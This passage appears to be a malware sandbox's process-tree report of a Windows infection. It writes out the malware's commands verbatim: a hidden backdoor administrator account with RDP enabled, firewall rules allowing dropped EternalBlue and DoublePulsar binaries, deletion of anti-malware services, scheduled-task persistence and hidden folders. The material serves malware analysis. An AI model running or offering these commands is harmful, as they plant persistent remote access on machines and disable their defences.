- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:1844
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
PID:2128 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:1556
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:500
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:4248
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4764
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:4088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:3976
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:676
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:1920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:4704
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:1652
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵PID:1644
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:2660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:4248
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:4936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵PID:4184
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3048 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1692
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:3660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:1844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:3976
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:676
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:4088
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:1920
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:4976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:3664
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3416
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4548
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1616
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:1616
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
- Executes dropped EXE
PID:2756 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1232 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F500.tmp\F501.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:4556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:1636
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:3060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:1452
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:4456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3416
-
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:2540
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
PID:3492
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:4140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:4712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4184
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4844
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4088
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5164
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5196
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:4328
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:2584
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:4804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:400
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:1832
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:3524
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:3556
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:2540
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:2128
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:4840
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:2756
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:3308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:4024
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:4408
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:4064
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:4140
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
PID:2948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:4088
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:5052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:5112
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:2980
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:1332
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:3920
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:1148
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:2584
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:500
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:2752
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:2400
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:832
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:2128
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:4588
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:2808 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:4804
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:3176
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:4184
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:3448
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:4732 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:2400 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:4644
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:1340
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:5100 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:1292
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:2984
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:4728
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:4028
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵PID:2780
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:3060
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4936
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:3456
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:3920
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:2380
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:4408
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:1920
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:5008
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:2540
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:1332
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵PID:1184
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:1540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2780
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:4808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:3860
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:4732
-
